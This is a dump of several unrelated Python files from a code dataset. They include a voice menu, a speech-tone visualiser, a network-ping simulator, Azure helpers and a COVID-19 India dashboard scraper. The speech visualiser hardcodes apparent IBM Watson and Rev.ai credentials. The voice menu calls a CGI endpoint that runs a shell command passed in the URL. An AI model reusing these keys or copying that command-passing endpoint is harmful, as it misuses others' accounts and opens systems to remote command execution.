('execute' in ch): \n\t\tpyttsx3.speak('Running the cal command')\n\t\twebbrowser.open(\"http://192.168.43.229/cgi-bin/iiec.py?x=cal&p=\")\n\t\tinput() \n\telif('exit' in ch):\n\t\tpyttsx3.speak('Exiting')\n\t\tbreak\n \n\telse:\n\t\tprint(\"not uderstand\")\n\t\tpyttsx3.speak('not understand')\n\t\tinput()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271972742","text":"from matplotlib import 
pyplot\n\nnunique_days = df.groupby(['code', 'hour']).nunique()['date'].reset_index()\nnunique_days = nunique_days.pivot(index='code', columns='hour', values='date')\n\npyplot.figure(\n figsize=(15, 15))\n\nsns.heatmap(\n data=nunique_days, \n linewidths=.2, \n xticklabels=True, \n yticklabels=True,\n annot=True)\n","sub_path":"visualization/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551561716","text":"import ast\r\nfrom zellegraphics import *\r\nimport json\r\nimport pyaudio\r\nfrom rev_ai.models import MediaConfig\r\nfrom rev_ai.streamingclient import RevAiStreamingClient\r\nfrom six.moves import queue\r\nfrom ibm_watson import ToneAnalyzerV3\r\nimport numpy as np\r\nimport threading\r\nfrom threading import Thread\r\nimport time\r\n\r\n\r\n#setting up initial figure\r\nfig_list = []\r\nfig = GraphWin(\"test\",1000,1000)\r\nmood_dict = {}\r\nfull_words = ''\r\n\r\n\r\ndef set_header():\r\n r1 = Rectangle(Point(2,0), Point(22,20))\r\n r1.setFill('red')\r\n r1.draw(fig)\r\n \r\n t0 = Text(Point(500,800),full_words)\r\n t0.setSize(12)\r\n t0.draw(fig)\r\n \r\n t1 = Text(Point(50,12),\"Anger\")\r\n t1.draw(fig)\r\n \r\n r2 = Rectangle(Point(2,25), Point(22,45))\r\n r2.setFill('yellow')\r\n r2.draw(fig)\r\n \r\n t2 = Text(Point(40,37),\"Joy\")\r\n t2.draw(fig)\r\n \r\n r3 = Rectangle(Point(2,50), Point(22,70))\r\n r3.setFill('blue')\r\n r3.draw(fig)\r\n \r\n t3 = Text(Point(60,62),\"Sadness\")\r\n t3.draw(fig)\r\n \r\n r4 = Rectangle(Point(2,75), Point(22,95))\r\n r4.setFill('green')\r\n r4.draw(fig)\r\n \r\n t5 = Text(Point(60,87),\"Confident\")\r\n t5.draw(fig)\r\n \r\n r5 = Rectangle(Point(112,0), Point(132,20))\r\n r5.setFill('black')\r\n r5.draw(fig)\r\n \r\n t4 = Text(Point(170,12),\"Tentative\")\r\n t4.draw(fig)\r\n \r\n r6 = Rectangle(Point(112,25), Point(132,45))\r\n r6.setFill('pink')\r\n r6.draw(fig)\r\n \r\n t6 = Text(Point(156,37),\"Fear\")\r\n t6.draw(fig)\r\n \r\n r7 = Rectangle(Point(112,50), Point(132,70))\r\n r7.setFill('white')\r\n r7.draw(fig)\r\n \r\n t7 = Text(Point(168,62),\"Analytic\")\r\n t7.draw(fig)\r\n \r\n\r\n'''\r\nc1 = Circle(Point(10,10),10)\r\nc1.draw(fig)\r\nfig_list.append(c1)\r\nc2 = Circle(Point(10,10),10)\r\nfig_list.append(c2)\r\nc2.draw(fig)\r\n'''\r\n\r\ndef simple_update(fig,fig_list,dictionary):\r\n print(\"SIMPLE UPDATING\")\r\n for item in fig_list:\r\n item.canvas.delete('all')\r\n fig_list = []\r\n set_header()\r\n fig.update()\r\n dcopy = dict(dictionary)\r\n highest = {}\r\n if len(dcopy) > 0:\r\n for key in dcopy:\r\n if dcopy[key] == max(dcopy.values()):\r\n highest[key] = dcopy[key]\r\n radius = max(dcopy.values())\r\n best_key = key\r\n if best_key == 'Fear':\r\n c=('Pink')\r\n if best_key == 'Joy':\r\n c=('yellow')\r\n if best_key == 'Sadness':\r\n c=('blue')\r\n if best_key == 'Analytical':\r\n c=('white')\r\n if best_key == 'Tentative':\r\n c=('black') \r\n if best_key == 'Confident':\r\n c=('green') \r\n if best_key == 'Anger':\r\n c=('Red')\r\n del(dcopy[best_key])\r\n t = (Circle(Point(500,500),highest[best_key]))\r\n t.setFill(c)\r\n t.draw(fig)\r\n #fig_list.append((Circle(Point(500,500),highest[best_key])).draw(fig))\r\n pi = np.pi\r\n intervals = []\r\n if len(dcopy) > 0:\r\n radian_interval = 2*pi/(len(dcopy))\r\n else:\r\n radian_interval = 0\r\n n = 0\r\n for key in dcopy.keys():\r\n temp = 
(Circle(Point((radius+dcopy[key])*np.cos(n*radian_interval)+500,(radius+dcopy[key])*np.sin(n*radian_interval)+500),dcopy[key]))\r\n if key == 'Fear':\r\n temp.setFill('Pink')\r\n if key == 'Joy':\r\n temp.setFill('yellow')\r\n if key == 'Sadness':\r\n temp.setFill('blue')\r\n if key == 'Analytical':\r\n temp.setFill('white')\r\n if key == 'Tentative':\r\n temp.setFill('black')\r\n if key == 'Confident':\r\n temp.setFill('green')\r\n if key == 'Anger':\r\n temp.setFill('Red') \r\n temp.draw(fig)\r\n fig_list.append(temp)\r\n n+=1\r\n return (fig,fig_list)\r\n\r\n\r\ntone_analyzer = ToneAnalyzerV3(version='2017-09-21',iam_apikey='DdFanI4TaHrDEKTITRDD7EOK6QaxkFv39Nmuvdov6NCi',url='https://gateway-syd.watsonplatform.net/tone-analyzer/api')\r\n\r\n\r\nclass MicrophoneStream(object):\r\n \"\"\"Opens a recording stream as a generator yielding the audio chunks.\"\"\"\r\n def __init__(self, rate, chunk):\r\n self._rate = rate\r\n self._chunk = chunk\r\n # Create a thread-safe buffer of audio data\r\n self._buff = queue.Queue()\r\n self.closed = True\r\n def __enter__(self):\r\n self._audio_interface = pyaudio.PyAudio()\r\n self._audio_stream = self._audio_interface.open(\r\n format=pyaudio.paInt16,\r\n # The API currently only supports 1-channel (mono) audio\r\n channels=1, rate=self._rate,\r\n input=True, frames_per_buffer=self._chunk,\r\n # Run the audio stream asynchronously to fill the buffer object.\r\n # This is necessary so that the input device's buffer doesn't\r\n # overflow while the calling thread makes network requests, etc.\r\n stream_callback=self._fill_buffer,\r\n )\r\n self.closed = False\r\n return self\r\n def __exit__(self, type, value, traceback):\r\n self._audio_stream.stop_stream()\r\n self._audio_stream.close()\r\n self.closed = True\r\n # Signal the generator to terminate so that the client's\r\n # streaming_recognize method will not block the process termination.\r\n self._buff.put(None)\r\n self._audio_interface.terminate()\r\n def _fill_buffer(self, in_data, frame_count, time_info, status_flags):\r\n \"\"\"Continuously collect data from the audio stream, into the buffer.\"\"\"\r\n self._buff.put(in_data)\r\n return None, pyaudio.paContinue\r\n def generator(self):\r\n while not self.closed:\r\n # Use a blocking get() to ensure there's at least one chunk of\r\n # data, and stop iteration if the chunk is None, indicating the\r\n # end of the audio stream.\r\n chunk = self._buff.get()\r\n if chunk is None:\r\n return\r\n data = [chunk]\r\n # Now consume whatever other data's still buffered.\r\n while True:\r\n try:\r\n chunk = self._buff.get(block=False)\r\n if chunk is None:\r\n return\r\n data.append(chunk)\r\n except queue.Empty:\r\n break\r\n yield b''.join(data)\r\n# Sampling rate of your microphone and desired chunk size\r\nrate = 44100\r\nchunk = int(rate/10)\r\n# Insert your access token here\r\naccess_token = \"025B_jazWiRLZ9kbTJUQWLNG9OCAgM3M2_LF0LZAxvFzOF740DssyFBwON0aAsgjWXPmn8ufNyUVrQUfR0vEGfQPAjzyw\"\r\n# Creates a media config with the settings set for a raw microphone input\r\nexample_mc = MediaConfig('audio/x-raw', 'interleaved', 44100, 'S16LE', 1)\r\nstreamclient = RevAiStreamingClient(access_token, example_mc)\r\n# Opens microphone input. 
The input will stop after a keyboard interrupt.\r\n\r\nwith MicrophoneStream(rate, chunk) as stream:\r\n # Uses try method to allow users to manually close the stream\r\n try: \r\n # Starts the server connection and thread sending microphone audio\r\n response_gen = streamclient.start(stream.generator())\r\n # Iterates through responses and prints them\r\n for response in response_gen:\r\n modified = False\r\n tones = {}\r\n words = []\r\n words2=[]\r\n rdict = (ast.literal_eval(response))\r\n if rdict['type'] == 'partial':\r\n for d in rdict['elements']:\r\n words.append(d['value'])\r\n if rdict['type'] == 'final':\r\n for d in rdict['elements']:\r\n if d['value'] not in [' ', ',','.',';']:\r\n words2.append(d['value'])\r\n if len(words) > 0:\r\n #the maybe words\r\n #print(words[-1])\r\n 1==1\r\n \r\n \r\n if len(words2) > 0:\r\n full_words = ''\r\n for char in words2:\r\n full_words+=char+\" \"\r\n #t0.draw(fig)\r\n text = str(words2)[1:-1]\r\n tone_analysis = tone_analyzer.tone({'text': text},content_type='application/json').get_result()['document_tone']['tones']\r\n for tone in tone_analysis:\r\n tones[tone['tone_name']] = tone['score']\r\n #print(tones)\r\n for key in tones.keys():\r\n if key not in mood_dict:\r\n mood_dict[key] = 100*float(tones[key])\r\n modified = True\r\n else: \r\n mood_dict[key] = (mood_dict[key]+ 100*float(tones[key]))\r\n modified = True\r\n for key in mood_dict.keys():\r\n mood_dict[key] = mood_dict[key]*.94\r\n #print(\"MOOD DICT\",mood_dict)\r\n \r\n results = simple_update(fig,fig_list,mood_dict)\r\n fig = results[0]\r\n fig_list = results[1]\r\n \r\n except KeyboardInterrupt:\r\n # Ends the websocket connection.\r\n streamclient.client.send(\"EOS\")\r\n fig.close()\r\n pass","sub_path":"HackMIT2019.py","file_name":"HackMIT2019.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"568339263","text":"import getopt\nimport sys\nfrom Simulator import Simulation\nimport numpy as np\n\nargumentHash = {'SIM_TIME': None, 'isFixedLatency': False, 'maxLatency': None, 'numLP':2}\n#if fixed, lower limit is equal to 1\n\n\nclass LPS:\n staticSim = None\n def __init__(self, thisID):\n self.thisID = thisID\n self.dstLP = None\n self.numRecieved = 0\n self.numSent = 0\n self.state = 0\n\n def generateInitialEvent(self):\n #state 0 means event created and put into queue\n #state 1 means event recieved, send new event, go to eventArrived\n #state 2 means finish. 
End state\n #timestamp is estimated arrival\n self.state = 0\n self.setDstLP((self.thisID+1) % argumentHash['numLP'])\n #constant LP\n if argumentHash['isFixedLatency']:\n latency = argumentHash['maxLatency']\n #randomLatency\n else:\n latency = np.random.randint(low=1, high=argumentHash['maxLatency']+1)\n dataList = {'destLP': self.dstLP, 'state': self.state}\n time_stamp = LPS.staticSim.getCurrTime() + latency #depart_time\n msgNode = LPS.staticSim.createMessage(dataList, time_stamp)\n LPS.staticSim.sendMessage(msgNode)\n\n def generateEvent(self):\n self.state = 1\n self.setDstLP((self.thisID+1) % argumentHash['numLP'])\n #constant LP\n if argumentHash['isFixedLatency']:\n latency = argumentHash['maxLatency']\n #randomLatency\n else:\n latency = np.random.randint(low=1, high=argumentHash['maxLatency']+1)\n dataList = {'destLP': self.dstLP, 'state': self.state}\n time_stamp = LPS.staticSim.getCurrTime() + latency #depart_time\n msgNode = LPS.staticSim.createMessage(dataList, time_stamp)\n LPS.staticSim.sendMessage(msgNode)\n def finishEvent(self):\n #event finished, do nothing\n self.state = 2\n\n\n def setDstLP(self, destLP):\n self.dstLP = destLP\n\n @staticmethod\n def setSim(ss):\n LPS.staticSim = ss\n\n\ndef prossargs():\n try:\n opt, args = getopt.getopt(sys.argv[1:], \"s:fk:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opts, arg in opt:\n if opts == '-s':\n if not arg.isdigit():\n usage()\n elif int(arg) <=0:\n print('Cannot have simtime <= 0, exiting...')\n else:\n argumentHash['SIM_TIME'] = int(arg)\n elif opts == '-f':\n argumentHash['isFixedLatency'] = True\n elif opts == '-k':\n if not arg.isdigit():\n usage()\n elif int(arg) <=0:\n print('Cannot have K <= 0, exiting...')\n else:\n argumentHash['maxLatency'] = int(arg)\n for a in argumentHash.keys():\n if argumentHash[a] is None:\n usage()\n\n\ndef usage():\n print('please input only int values for args')\n print(\n \"python ping.py -s 'INT-TIME' [-f optional ] -k 'INT -upper Latency'\")\n exit(2)\n\n\n#onLp is the number of which LP currently being created.\n\n\nprossargs()\n\nlistOfLp=list()\n\nfor lps in range(argumentHash['numLP']):\n listOfLp.append(LPS(lps))\n\ns = Simulation(simTime=argumentHash['SIM_TIME'], latencyUpper=argumentHash['maxLatency'], isLatencyConstant=argumentHash['isFixedLatency'], lpList=listOfLp)\nLPS.setSim(s)\ns.simulate()\nprint(\"Number of total trip: {}\".format(s.getNumTotalTrips()))\nprint(\"Number of total round trips: {}\".format(s.getNumRoundTrips()))","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549642076","text":"#!/usr/bin/env python\n\nimport json,sys\nfrom util import print_error, print_log, print_result\n\n\ndef deunicodify_hook(pairs):\n new_pairs = []\n for key, value in pairs:\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n if isinstance(key, unicode):\n key = key.encode('utf-8')\n new_pairs.append((key, value))\n return dict(new_pairs)\n\ndef construct_fip_id(subscription_id, group_name, lb_name, fip_name):\n \"\"\"Build the future FrontEndId based on components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/frontendIPConfigurations/{}').format(\n subscription_id, group_name, lb_name, fip_name\n )\n\ndef construct_bap_id(subscription_id, group_name, lb_name, address_pool_name):\n \"\"\"Build the future BackEndId based on 
components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/backendAddressPools/{}').format(\n subscription_id, group_name, lb_name, address_pool_name\n )\n\ndef construct_probe_id(subscription_id, group_name, lb_name, probe_name):\n \"\"\"Build the future ProbeId based on components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/probes/{}').format(\n subscription_id, group_name, lb_name, probe_name\n ) \n\ndef update_nic_paramaters(address_pool_id, location, nic_info, params):\n \"\"\"Update the NIC parameters structure.\n \"\"\"\n nic_params = params['nicParams']\n nic_params['location'] = location\n nic_params['ip_configurations'][0]['name'] = nic_info.ip_configurations[0].name\n nic_params['ip_configurations'][0]['subnet']['id'] = nic_info.ip_configurations[0].subnet.id\n nic_params['ip_configurations'][0]['load_balancer_backend_address_pools'] = [{\n \"id\": address_pool_id\n }]\n\n return nic_params\n\n #nic_params['ip_configurations'][0]['load_balancer_inbound_nat_rules'][0]['id'] = natrule_id\n\ndef create_vm_parameters(nic_id, is_nic_primary, location, vm_info, params):\n \"\"\"Create the VM parameters structure.\n \"\"\"\n vm_params = params['vmParams']\n vm_params['location'] = location\n vm_params['network_profile']['network_interfaces'][0]['id'] = nic_id\n vm_params['network_profile']['network_interfaces'][0]['primary'] = is_nic_primary\n return vm_params \n\ndef get_error_messages():\n messages = {}\n try:\n with open('error_messages.json', 'r') as file:\n messages = json.loads(str(file.read()), object_pairs_hook=deunicodify_hook)\n except Exception as err:\n print_error('failed to load parmaters json!')\n sys.exit(127)\n\n return messages\n\ndef generate_params_error_message(parameters, error_message):\n reason = \"\"\n if isinstance(parameters, list):\n reason = ','.join(parameters)\n else:\n reason = parameters\n\n reason += \" ,\" + error_message\n return reason\n\n\ndef write_log(err):\n f = open('FAILURE','w')\n f.write(str(err))\n f.close()\n\ndef error_messages():\n global error_messages\n error_messages = get_error_messages()\n\nerror_messages()","sub_path":"Content/Networking/DNS/Azure/AzureDnsZones/WorkloadManager/src/Azure_dns_zones/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537849782","text":"\"\"\" Module for feature extraction based on special characters (e.g. ? ! .) 
\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom path_helper import get_project_root\n\n\nclass SpecialCharacters:\n \"\"\" Extract list of special characters (list is set in constructor) \"\"\"\n\n def __init__(self):\n self.list_of_special_characters = {\n \"exclamation_mark\": \"!\",\n \"question_mark\": \"?\",\n \"full_stop_mark\": \".\",\n }\n\n def extract_features(self, df, visualize=False):\n \"\"\"Extract number of special characters per data instance\n Parameters:\n df with the columns: class and content\n Return:\n passed df with new feature columns containing the count of the special character\n \"\"\"\n for key in self.list_of_special_characters:\n df = self._count_number_of_special_characters(\n key, self.list_of_special_characters[key], df\n )\n if visualize:\n self.visualize_special_characters(df)\n return df\n\n def _count_number_of_special_characters(self, character_name, character, df):\n feature_name = \"number_of_\" + character_name\n df[feature_name] = df[\"content\"].apply(\n lambda cell: self._count_character(cell, character)\n )\n return df\n\n @staticmethod\n def _count_character(sentence, character):\n return sentence.count(character)\n\n def visualize_special_characters(self, df):\n \"\"\"Visualizes the number of special characters as bar plot\n Parameters:\n df: dataframe with the extracted features for special characters\n Return:\n stores barplots in analysis folder\n \"\"\"\n df_hate_speech = df[df[\"class\"] == 0]\n df_neutral_speech = df[df[\"class\"] == 1]\n for character in self.list_of_special_characters:\n hate_bincount = self._calculate_bincount_of_special_character(\n df_hate_speech, character\n )\n neutral_bincount = self._calculate_bincount_of_special_character(\n df_neutral_speech, character\n )\n\n hate_bincount_summarized = self._summarize_bincount_data(hate_bincount)\n neutral_bincount_summarized = self._summarize_bincount_data(\n neutral_bincount\n )\n\n x = np.arange(11)\n plt.bar(x + 0.0, hate_bincount_summarized, color=\"r\", width=0.2)\n plt.bar(x + 0.2, neutral_bincount_summarized, color=\"b\", width=0.2)\n x_ticks = [str(x) for x in range(10)]\n x_ticks.append(\">10\")\n plt.xticks(x, x_ticks)\n plt.title(\n \"Number of data instances with number of \"\n + self.list_of_special_characters[character]\n )\n plt.xlabel(\"Number of \" + character)\n plt.ylabel(\"Number of data instances\")\n plt.legend([\"hate speech\", \"neutral speech\"])\n plt.savefig(\n str(get_project_root())\n + \"/analysis/features/semantic/barchart_special_character_\"\n + character\n )\n\n def _calculate_bincount_of_special_character(self, df, character):\n return np.bincount(np.array(df[\"number_of_\" + character]))\n\n def _summarize_bincount_data(self, array):\n return np.append(array[:10], array[10:].sum())\n","sub_path":"src/feature_extraction/semantic/special_characters.py","file_name":"special_characters.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459766823","text":"import numpy as np\nfrom sklearn import datasets\nfrom scipy.sparse.linalg import eigs\nfrom plot_slices import plot2d\nfrom sklearn_digits_tut import get_digits_classifier\n\n# Implements the visualisation method described in Adel et al.\n# 3D scattering transforms for disease classification in neuroimaging (2017).\n\n\ndef approximate_gradient(classifier, x, X, k=6, epsilon=1e-5):\n \"\"\"\n classifier: outputs probability of vector x belonging to a certain class (G(x) in 
paper)\n x: input feature vector\n X: training data set (needed in order to calculate priciple directions)\n k: number of principle directions to use in approximating the gradient of the classifier G(x).\n epsilon: magnitude of perturbation (must be small.)\n \"\"\"\n\n # Each row represents an observation\n covariance_matrix = np.cov(X, rowvar=False)\n eigenvalues, eigenvectors = eigs(covariance_matrix, k=k)\n eigenvalues, eigenvectors = np.real(eigenvalues), np.real(eigenvectors)\n\n classifier_x = classifier.decision_function(x.reshape((1, -1)))\n gradient = np.zeros(eigenvectors.shape[0])\n for i in range(k):\n eigenvector = eigenvectors[:, i]\n gradient += ((classifier_x - classifier.decision_function((x + epsilon*eigenvector).reshape((1, -1)))) / epsilon) * eigenvector\n\n return gradient\n\n\ndef visualize_gradient(gradient):\n # reshape back to 2D array representing image.\n gradient = np.reshape(gradient, (int(np.sqrt(gradient.shape[0])), int(np.sqrt(gradient.shape[0]))))\n plot2d(gradient)\n\n\ndef stub_classifier(x):\n return np.random.rand()\n\n\nif __name__ == '__main__':\n digits = datasets.load_digits()\n feature_vectors = digits.data\n x = feature_vectors[0]\n k = 6\n\n gradient = approximate_gradient(stub_classifier, x, feature_vectors, k)\n visualize_gradient(gradient)\n","sub_path":"visualisation_gradient.py","file_name":"visualisation_gradient.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269911838","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\npd.options.display.max_columns= None\npd.options.display.max_rows= None\nfrom datetime import date \n\n# Scraping\nimport requests \nfrom bs4 import BeautifulSoup \nimport numpy as np \n\n# Dashboarding\nimport dash\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_daq as daq\nfrom dash.dependencies import Input, Output\nfrom plotly.subplots import make_subplots\n\n\n# In[2]:\n\n\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row] \ngovt = 'https://www.mohfw.gov.in/'\n\nresponse = requests.get(govt).content \nsoup = BeautifulSoup(response, 'html.parser') \n\nstats = [] \nall_rows = soup.find_all('tr') \n\nfor row in all_rows:\n stat= extract_contents(row.find_all('td'))\n print(stat)\n if len(stat)>=5:\n stats.append(stat)\n\n\n# In[3]:\n\n\nheaders= ['Sno', 'State', 'Active', 'Recovery', 'Death', 'Confirmed']\n\n\n# In[4]:\n\n\ndf= pd.DataFrame(stats, columns= headers).set_index('State')\ndf.drop(['Sno'], axis= 1, inplace= True)\ndf= df.replace({'#': ''}, regex=True)\ndf= df.replace({'*': ''})\n#df= df.astype(int)\n\n\n# In[5]:\n\n\nn= len(df) - 1\nc= df['Confirmed'].tail(1)[0]\nd= df['Death'].tail(1)[0]\nr= df['Recovery'].tail(1)[0]\n\n\n# In[6]:\n\n\ndf.rename({'Total#': 'India'}, axis='index', inplace= True)\n#df.drop(['Cases being reassigned to states'], inplace= True)\ndf= df.astype(int)\ndf_a= df.drop(['India']).sort_values(['Confirmed'])\ndf_d= df.drop(['India']).sort_values(['Confirmed'], ascending= False)\n\n\n# In[7]:\n\n\nhnames= []\nhnames.append({'label': 'WB helpline 1', 'value': 'wb1'})\nhnames.append({'label': 'WB helpline 2', 'value': 'wb2'})\nhnames.append({'label': 'Beliaghata ID', 'value': 'id'})\nhnames.append({'label': 'PG Hospital', 'value': 'pg'})\nhnames.append({'label': 'R G Kar', 'value': 'rg'})\n\n\n# 
In[8]:\n\n\nhphone= []\nhphone.append({'label': 'wb1', 'value': '033-24312600'})\nhphone.append({'label': 'wb2', 'value': '1800313444222'})\nhphone.append({'label': 'id', 'value': '033-23032200'})\nhphone.append({'label': 'pg', 'value': '033-22041101'})\nhphone.append({'label': 'rg', 'value': '033-25557656'})\nhphone.append({'label': 'nb', 'value': '0353 258 5478'})\n\n\n# In[9]:\n\n\nhloc= []\nhloc.append({'label': 'wb1', 'value': 'None'})\nhloc.append({'label': 'wb2', 'value': 'None'})\nhloc.append({'label': 'id', 'value': 'Phoolbagan, Kolkata 700010'})\nhloc.append({'label': 'pg', 'value': 'AJC Bose Rd, Kolkata 700020'})\nhloc.append({'label': 'rg', 'value': 'KB Sarani, Kolkata 700004'})\nhloc.append({'label': 'nb', 'value': 'Sushruta Nagar, Siliguri 734012'})\n\n\n# In[10]:\n\n\nheading1= 'COVID-19 @ INDIA'\nhelpp= '+91-11-23978046, 1075'\nid_help= ' ID: 033-23032200'\nrg_help= ' RG Kar: 033-25557656'\npg_help= ' PG: 033-22041101'\nwb_help= ' WB Helpline: 033-24312600'\nnb_help= ' NBMC: 0353 258 5478'\n\n\n# In[11]:\n\n\nst_ab= {\n 'AP': 'Andhra Pradesh',\n 'AR': 'Arunachal Pradesh',\n 'AS': 'Assam',\n 'BR': 'Bihar',\n 'CG': 'Chhattisgarh',\n 'GA': 'Goa',\n 'GJ': 'Gujarat',\n 'HR': 'Haryana',\n 'HP': 'Himachal Pradesh',\n 'JK': 'Jammu and Kashmir',\n 'JH': 'Jharkhand',\n 'KA': 'Karnataka',\n 'KL': 'Kerala',\n 'MP': 'Madhya Pradesh',\n 'MH': 'Maharashtra',\n 'MN': 'Manipur',\n 'ML': 'Meghalaya',\n 'MZ': 'Mizoram',\n 'NL': 'Nagaland',\n 'OR': 'Orissa',\n 'PB': 'Punjab',\n 'RJ': 'Rajasthan',\n 'SK': 'Sikkim',\n 'TN': 'Tamil Nadu',\n 'TR': 'Tripura',\n 'UK': 'Uttarakhand',\n 'UP': 'Uttar Pradesh',\n 'WB': 'West Bengal',\n 'AN': 'Andaman and Nicobar Islands',\n 'CH': 'Chandigarh',\n 'DH': 'Dadra and Nagar Haveli',\n 'DD': 'Daman and Diu',\n 'DL': 'Delhi',\n 'LD': 'Lakshadweep',\n 'PY': 'Pondicherry',\n 'TG': 'Telengana',\n 'UT': 'Uttarakhand',\n 'LA': 'Ladakh',\n 'DN': 'Dadra and Nagar Haveli',\n}\n\n\n# In[12]:\n\n\nupdt= 'updated on ' + str(date.today())\nstates= []\nfor i in df.index.tolist():\n states.append({'label': i, 'value': i})\n\n\n# In[13]:\n\n\nindiats= 'https://api.covid19india.org/csv/latest/case_time_series.csv'\nsw= 'https://api.covid19india.org/csv/latest/state_wise.csv'\nsw= pd.read_csv(sw)\ndsw= 'https://api.covid19india.org/csv/latest/state_wise_daily.csv'\ndsw= pd.read_csv(dsw, )\ndfts= pd.read_csv(indiats)\ndfts['Date']= dfts['Date'].str[0:6]\n#sw['Date']= sw['Date'].str[0:6]\ndsw['Date']= dsw['Date'].str[0:6].str.replace('-', ' ')\n#dsw['Date']\n\n\n# In[27]:\n\n\nstatewise_tested_numbers_data= 'https://api.covid19india.org/csv/latest/statewise_tested_numbers_data.csv'\nstnd= pd.read_csv(statewise_tested_numbers_data)\nstndd= stnd.groupby(['State']).last().reset_index()\n#stndd['Population NCP 2019 Projection'].replace({',': ''}, regex= True, inplace= True)\nstndd.set_index(['State'], inplace= True)\nstndd.loc['India', 'Total Tested']= stndd['Total Tested'].sum()\nstndd.loc['India', 'Positive']= stndd['Positive'].sum()\nstndd['Negative']= stndd['Negative'].str.strip('+')\nstndd['Negative']= stndd['Negative'].fillna(0).replace(' ', 0).astype(float, )\nstndd.loc['India', 'Negative']= stndd['Negative'].sum()\nstndd.loc['India', 'Unconfirmed']= stndd['Unconfirmed'].sum()\nstndd['Population NCP 2019 Projection']= stndd['Population NCP 2019 Projection'].dropna().astype(int)\nstndd.loc['India', 'Population NCP 2019 Projection']= stndd['Population NCP 2019 Projection'].sum()\nstndd.loc['India', 'Tests per thousand']= stndd['Tests per thousand'].mean()\n\nstndd.loc['India', 
'Test positivity rate']= round((stndd.loc['India', 'Positive']/stndd.loc['India', 'Total Tested'])*100, 2)\nstndd.loc['India', 'Test positivity rate']= str(stndd.loc['India', 'Test positivity rate']) + '%'\n\n\n# In[28]:\n\n\ntnid= 'https://api.covid19india.org/csv/latest/tested_numbers_icmr_data.csv'\ntnidf= pd.read_csv(tnid)\n\n\n# In[29]:\n\n\ndates= []\nfor i, j in enumerate(dfts['Date'].tolist()):\n dates.append({'label': j, 'value': i})\n############################################################################# \ndef get_cts(dt1, dt2):\n df= dfts[dfts.index.to_series().between(dt1, dt2)]\n cnfrm= go.Scatter(x= df['Date'], y= df['Total Confirmed'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Confirmed')\n rcvr= go.Scatter(x= df['Date'], y= df['Total Recovered'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Recovered')\n dth= go.Scatter(x= df['Date'], y= df['Total Deceased'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Deceased')\n\n fig = make_subplots(rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.03,\n row_titles=(\"Confirmed\", \"Recovered\", \"Deceased\"))\n fig.append_trace(cnfrm, 1, 1)\n fig.append_trace(rcvr, 2, 1)\n fig.append_trace(dth, 3, 1)\n fig.update_xaxes(dtick= 7)\n fig.update_layout(plot_bgcolor= 'rgba(0,0,0,0)', margin= {'t':0, 'b':0, 'l':0, 'r':50},\n hovermode= 'closest', hoverdistance= 50000, \n showlegend= False, height=350, paper_bgcolor='rgba(0,0,0,0)')\n \n return fig\n############################################################################# \ndef get_dts(dt1, dt2):\n df= dfts[dfts.index.to_series().between(dt1, dt2)]\n cnfrm= go.Bar(x= df['Date'], y= df['Daily Confirmed'], name= 'Confirmed',\n text= df['Daily Confirmed'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n rcvr= go.Bar(x= df['Date'], y= df['Daily Recovered'], name= 'Recovered',\n text= df['Daily Recovered'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n dth= go.Bar(x= df['Date'], y= df['Daily Deceased'], name= 'Deceased',\n text= df['Daily Deceased'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n\n fig = make_subplots(rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.03,\n row_titles=(\"Confirmed\", \"Recovered\", \"Deceased\"))\n fig.append_trace(cnfrm, 1, 1)\n fig.append_trace(rcvr, 2, 1)\n fig.append_trace(dth, 3, 1)\n fig.update_layout(plot_bgcolor= 'rgba(0,0,0,0)', margin= {'t':0, 'b':0, 'l':0, 'r':50}, \n showlegend= False, height=350, paper_bgcolor='rgba(0,0,0,0)',\n \n \n )\n\n \n return fig\n\n\n# In[30]:\n\n\nnos= []\nfor i in [3, 5, 7, 10]:\n nos.append({'label': i, 'value': 